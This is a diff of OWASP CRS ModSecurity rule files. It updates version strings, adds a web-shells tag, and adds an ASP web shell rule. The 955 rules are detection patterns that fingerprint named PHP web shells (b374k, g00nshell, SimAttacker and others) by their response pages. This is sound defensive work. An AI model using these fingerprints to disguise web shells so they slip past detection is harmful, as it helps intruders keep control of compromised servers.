-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -214,8 +224,9 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -233,8 +244,9 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - "
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -252,8 +264,9 @@ SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -271,8 +284,9 @@ SecRule RESPONSE_BODY "@rx <title>lama's'hell v. [0-9.]+</title>" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -290,8 +304,9 @@ SecRule RESPONSE_BODY "@rx ^ *<html>\n[ ]+<head>\n[ ]+<title>lostDC - " \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -309,8 +324,9 @@ SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell</title>\r\n<html>\r\n<body>\r\n
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -328,8 +344,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<div align=\"left\"><font size=\"1\"
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -349,8 +366,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<title>Ru24PostWebShell " \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -368,8 +386,9 @@ SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King</title
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -387,8 +406,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -406,8 +426,9 @@ SecRule RESPONSE_BODY "@rx ^ <html>\n\n<head>\n\n<title>g00nshell v[0-9.]+ " \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -427,8 +448,9 @@ SecRule RESPONSE_BODY "@contains <title>punkholicshell</title>" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -446,8 +468,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\n      <head>\n             <title>azrail [0-
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -465,8 +488,9 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -484,8 +508,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<title>.*? ~ Shell I</title>\n<head>\n<style
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -503,15 +528,36 @@ SecRule RESPONSE_BODY "@rx ^ <html><head><title>:: b374k m1n1 [0-9.]+ ::</title>
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    severity:'CRITICAL',\
+    setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# This rule is intended for ASP web shells.
+SecRule RESPONSE_BODY "@pmFromFile web-shells-asp.data" \
+    "id:955400,\
+    phase:4,\
+    block,\
+    capture,\
+    t:none,\
+    msg:'ASP Web shell detected',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\
+    tag:'language-php',\
+    tag:'platform-multi',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/1',\
+    tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
+    tag:'capec/1000/225/122/17/650',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -531,21 +577,24 @@ SecRule RESPONSE_BODY "@contains <h1 style=\"margin-bottom: 0\">webadmin.php</h1
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:955015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:955016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:955015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:955016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:955017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:955018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:955017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:955018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
index 4e41686a4..23f08a6a7 100644
--- a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
+++ b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -35,7 +35,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl1}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
@@ -45,7 +45,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl1}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
@@ -55,7 +55,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl2}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
@@ -65,7 +65,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl2}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
@@ -75,7 +75,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl3}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
@@ -85,7 +85,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl3}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
@@ -95,7 +95,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
@@ -105,7 +105,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
 
 # at start of phase 4, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores
@@ -117,7 +117,7 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=0'"
 
 SecAction \
@@ -127,7 +127,7 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=0'"
 
 SecMarker "EARLY_BLOCKING_ANOMALY_SCORING"
@@ -141,7 +141,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl1}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
@@ -151,7 +151,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl1}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
@@ -161,7 +161,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl2}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
@@ -171,7 +171,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl2}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
@@ -181,7 +181,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl3}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
@@ -191,7 +191,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl3}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
@@ -201,7 +201,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
@@ -211,7 +211,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
 
 #
@@ -227,7 +227,7 @@ SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_thre
     msg:'Outbound Anomaly Score Exceeded in phase 3 (Total Score: %{tx.blocking_outbound_anomaly_score})',\
     tag:'anomaly-evaluation',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     chain"
     SecRule TX:EARLY_BLOCKING "@eq 1"
 
@@ -240,34 +240,34 @@ SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_thre
     msg:'Outbound Anomaly Score Exceeded (Total Score: %{tx.blocking_outbound_anomaly_score})',\
     tag:'anomaly-evaluation',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:959013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:959014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:959013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:959014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:959015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:959016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:959015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:959016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:959017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:959018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:959017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:959018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-980-CORRELATION.conf b/rules/RESPONSE-980-CORRELATION.conf
index ca5dc5d9d..8cce61516 100644
--- a/rules/RESPONSE-980-CORRELATION.conf
+++ b/rules/RESPONSE-980-CORRELATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -28,7 +28,7 @@ SecAction \
     nolog,\
     noauditlog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_anomaly_score=%{tx.blocking_inbound_anomaly_score}',\
     setvar:'tx.blocking_anomaly_score=+%{tx.blocking_outbound_anomaly_score}',\
     setvar:'tx.detection_anomaly_score=%{tx.detection_inbound_anomaly_score}',\
@@ -41,33 +41,33 @@ SecAction \
 #
 
 # -= Reporting Level 0 =- (Skip over reporting when tx.reporting_level is 0)
-SecRule TX:REPORTING_LEVEL "@eq 0" "id:980041,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REPORTING"
+SecRule TX:REPORTING_LEVEL "@eq 0" "id:980041,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REPORTING"
 
 # -= Reporting Level 5 =- (Jump to reporting rule immediately when tx.reporting_level is 5 or greater)
-SecRule TX:REPORTING_LEVEL "@ge 5" "id:980042,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
+SecRule TX:REPORTING_LEVEL "@ge 5" "id:980042,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
 
 # -= Zero detection score =- (Skip over reporting when sum of inbound and outbound detection score is equal to 0)
-SecRule TX:DETECTION_ANOMALY_SCORE "@eq 0" "id:980043,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REPORTING"
+SecRule TX:DETECTION_ANOMALY_SCORE "@eq 0" "id:980043,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REPORTING"
 
 # -= Blocking score exceeds threshold =- (Jump to reporting rule immediately if a blocking score exceeds a threshold)
-SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" "id:980044,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
-SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" "id:980045,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
+SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" "id:980044,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
+SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" "id:980045,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
 
